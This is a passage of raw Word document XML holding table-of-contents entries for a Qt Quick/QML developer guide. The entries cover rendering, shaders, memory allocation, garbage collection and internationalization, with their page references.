          <w:t>Using Dynamic Creation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605313 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>138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14" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Destroy Unused Elements</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605314 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>138</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15" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rendering</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605315 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>139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16" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Clipping</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605316 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>139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17" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Over-drawing and Invisible Elements</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605317 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>139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18" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Translucent vs Opaque</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605318 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>139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19" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Shaders</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605319 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>139</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20" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Memory Allocation And Collection</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605320 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>140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21" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Tips For QML Application Developers</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605321 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>140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22" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Instantiate and initialize components lazily</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605322 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>140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23" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Destroy unused objects</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605323 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>140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24" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Don't manually invoke the garbage collector</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605324 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>141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25" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Avoid complex bindings</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605325 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>141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26" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Avoid defining multiple identical implicit types</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605326 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>141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27" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Re-use existing components</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605327 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>141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28" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Use singleton types instead of pragma library scripts</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605328 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>142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29" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Memory Allocation in a QML Application</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605329 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>142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30" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>In-Depth Memory Allocation Considerations</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605330 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>144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31" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Fragmentation</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605331 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>144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32" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Garbage</w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="be-BY"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Collection</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605332 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>145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333" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Implications of Garbage Collection</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605333 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>145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334" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Manually Invoking the Garbage Collector</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605334 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>145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35" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Memory vs Performance Trade-offs</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605335 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>146</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00385670" w:rsidRPr="00385670" w:rsidRDefault="00385670">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc483605336" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:spacing w:val="-15"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Internationalization and Localization with Qt Quick</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605336 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>146</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37" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:noProof/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Internationalizing Your Application</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc483605337 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>146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38" w:history="1">
        <w:r w:rsidRPr="001608F1">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
